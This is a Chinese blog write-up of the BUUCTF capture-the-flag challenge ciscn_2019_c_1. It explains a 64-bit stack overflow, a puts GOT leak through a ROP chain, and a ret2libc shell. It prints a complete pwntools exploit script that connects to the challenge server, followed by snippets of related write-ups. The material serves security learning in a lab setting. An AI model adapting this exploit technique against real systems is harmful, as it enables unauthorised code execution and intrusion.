ciscn_2019_c_1

最新推荐文章于 2025-02-15 13:30:44 发布
最新推荐文章于 2025-02-15 13:30:44 发布
阅读量431 收藏 7
点赞数 4
分类专栏: buuctf Pwn 文章标签: linux BUUCTF 安全 CTF
加油加油~
本文链接:https://blog.youkuaiyun.com/wcj126/article/details/140360259
版权

如果是第一次接触ROP链,一定要看下面这位哥的博客,真的好 

pwn入门:基本栈溢出之ret2libc详解(以32位+64位程序为例)-优快云博客
知识点 libc库

搞了好几天,我勒个豆

前面什么就不说了

IDA打开吧

main函数

进入这里

漏洞点

地址400740

溢出长度

0x50+0x8

环顾一周

我勒个骚刚

没有后门函数(/bin/sh)

_______________________

这道题需要我们自己构建函数

那有下面问题了

这里没有bin函数,我要怎么得到bin函数的地址呢?

回答:其实这个程序构造的时候,使用了libc库函数,虽然我们看不见,但是在他主机里面,仍然存在libc库,libc库里面什么函数都有

[BUUCTF]PWN6——ciscn_2019_c_1_bugkuctf-pwn题pwn6-优快云博客

 这是借鉴的博客

里面有这段话,我来解释下

1.利用libc的时候,本地的函数地址和libc的函数地址,有一定的偏移量,这个偏移量是固定的,也就是说,我们知道了偏移量,libc的版本我们就知道了

2.是具体找到偏移量的方法

3.最后我们找到了libc的版本,因为libc里面bin/sh这样的函数地址是固定的,我们又知道了偏移量,那么我们直接偏移量+libc地址,就可以利用后门函数了

r.sendlineafter('choice!\n','1')
payload='\0'+'a'*(0x50-1+8)   #首位填‘\0’,绕过加密,之后填上a覆盖到返回地址
payload+=p64(pop_rdi)
payload+=p64(puts_got)   #设置rdi寄存器的值为puts的got表地址
payload+=p64(puts_plt)   #调用puts函数,输出的是puts的got表地址
payload+=p64(main)       #设置返回地址,上述步骤完成了输出了puts函数的地址,我们得控制程序执行流
                         #让它返回到main函数,这样我们才可以再一次利用输入点构造rop 

r.sendlineafter('encrypted\n',payload)
r.recvline()
r.recvline()

puts_addr=u64(r.recvuntil('\n')[:-1].ljust(8,'\0'))#接收程序返回的地址
                                                   #lijust(8,‘\0’),不满8位的用0补足
libc=LibcSearcher('puts',puts_addr)  #利用LibcSearcher模块找到匹配的libc版本

首先我们构造函数 在64位里面,我们需要通过寄存器穿参数来构造

我们找到RDI

 

 ROPgadget --binnary [文件名] --only'pop|rdi|ret'

这里一般用rdi吧

地址:0400c83

return地址我们也要用到

这里是64要用的

【PWN学习】如何获取libc基址_pwn libc-优快云博客

这篇博客真行,兄弟们

给我教会了

from pwn import*
from LibcSearcher import*

r=remote('node3.buuoj.cn',28214)
elf=ELF('./ciscn_2019_c_1')
main=0x400b28
pop_rdi=0x400c83
ret=0x4006b9
puts_plt=elf.plt['puts']#获取plt表
puts_got=elf.got['puts']#获取got表
r.sendlineafter('choice!\n','1')
payload='\0'+'a'*(0x50-1+8)
payload+=p64(pop_rdi)
payload+=p64(puts_got)
payload+=p64(puts_plt)
payload+=p64(main)#再次执行main函数
r.sendlineafter('encrypted\n',payload)
r.recvline()
r.recvline()
puts_addr=u64(r.recvuntil('\n')[:-1].ljust(8,'\0'))#得到本地的put地址实际地址
print (hex(puts_addr))
libc=LibcSearcher('puts',puts_addr)#根据找到的libc确定libc版本
offset=puts_addr-libc.dump('puts')#确定偏移量
binsh=offset+libc.dump('str_bin_sh')
system=offset+libc.dump('system')#利用偏移量得到libc时间地址的binsh
r.sendlineafter('choice!\n','1')
payload='\0'+'a'*(0x50-1+8)
payload+=p64(ret)
payload+=p64(pop_rdi)
payload+=p64(binsh)
payload+=p64(system)
r.sendlineafter('encrypted\n',payload)
r.interactive()

结合上面那个博客,这代码应该就OK了

!

BUUCTF ciscn_2019_c_1 题解
qq_51802916的博客
08-20 477
这个地方还会涉及到堆栈对齐的问题,有时候POC都构造正确了,但是运行时仍然报段错误,可能就是堆栈没有对齐,这是我们可以加入一条ret指令,改变一下堆栈,例如假如rsp指向了0xff88,这是一个没有对齐的地址,增加ret后就会变成0xff90,这个一个已经对齐的地址,可以正常运行。,这里显然可以进行缓冲区溢出利用,中间的部分是对字符串进行处理,我们不需要看得太仔细,因为可以通过传入\x00字符使循环提前终止,这样就不会影响我们的payload的了。的装载地址和shell字符串的装载地址,然后构造POC了。
【BUU】ciscn_2019_c_1
bzduanlei的博客
07-30 339
一、解题思路 0x01 检查文件 开启了NX保护,堆栈不可执行。 0x02 将文件拖入IDA分析 分析主函数,发现get(s)函数存在栈溢出。 0x03 未寻找到system和‘/bin/sh’,需要通过puts函数泄露远端服务器中libc的基址,从而利用远端服务器libc中的system和字符串‘/bin/sh’的地址构造payload。 借助LibcSearcher工具,查找函数在内存中的真正地址。 LibcSearcher安装: git clone https://github.com/liean
buuctf ciscn_2019_n_5
最新发布
qq_53912227的博客
02-15 210
发现有个name的全局变量(bss),这个时候就想到用ret2shellcode,但是实际上是不行的,因为这个name的bss不具有x权限。shift+f12发现没有system和binsh等字符串,因此就需要用到ret2libc,这里的puts正好提前被使用了。发现NX unknown(想到了ret2shellcode)这个时候就可以确定ret2shellcode不行。开局:典型的ret2libc,老规矩,file 文件。
ciscn_2019_n_3
12-30
ciscn(全国大学生信息安全竞赛),2019年的一道题目,涉及到fastbin堆漏洞的利用。由于调用了system函数,所以漏洞利用的难度不大,推荐初学者练习。题解链接:...
ciscn_2019_c_1 1
qq_41560595的博客
10-06 4488
payload构造 此题和之前总结的ret2libc题型相似,但是那个题是32位的,而此题是64位的。因此,payload的构造方式不一样。 payload1 此时的esp正处于函数返回的状态,即从上往下走。 在64位中,有rdi,rsi,rdx,rcx,r8,r9几个寄存器保存参数。当esp指向pop rdi ;ret时,rip指向puts_got,puts_got所保存的真实地址就能弹到rdi上。以上是准备参数。 再往下就是是固定格式“函数地址+返回地址+参数”的体现: 利用puts_plt作为函数地
日行一PWN之ciscn_2019_c_1不给出libc题型
m0_57221101的博客
06-02 898
BUUCTF ciscn 依旧使用buu提供的题这次大体和上次babyrop一样,都是使用源程序中不存在的函数来进行攻击,区别在于此次没有给出libc的版本,我们需要自己暴漏libc的版本以及本次的64位程序,在传参上和32位程序的一些不同闲话少叙,后面需要的知识点我们后面再学,我们便分析边聊checksec分析64位的程序,只有数据段免执行保护。地址为0000000000400B28我们可以通过telnet连接一下看看她在干什么可以看到是一个简单的输入判断
[buuuctf]ciscn_2019_c_1
逆向萌新的博客
06-16 487
[buuuctf]ciscn_2019_c_1细致教程
BUUCTF-PWN】 ciscn_2019_c_1
qcwwww的博客
05-07 505
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 checksec一下 新的改变 我们对Markdown编辑器进行了一些功能拓展与语法支持,除
[BUUCTF]ciscn_2019_c_1
Lucien_Carr的博客
04-08 1586
想办法通过encrypt函数的 get函数栈溢出获得其中一个函数的地址(本题选择puts),通过LibcSearcher得到该函数在对应libc中的偏移量。没有‘system’,‘bin/sh’等有用的字符串,函数列表里也没有system等后门函数。该程序中并没有system,bin/sh等有用的字符串,无法使用ret2text。也没有构造溢出的函数,但是有很多puts,很好后面ret2libc可以用。通过已经调用过的函数泄露它在程序中的地址,然后利用地址末尾的3个字节,在。没什么能构造溢出的函数。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

name_name123

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值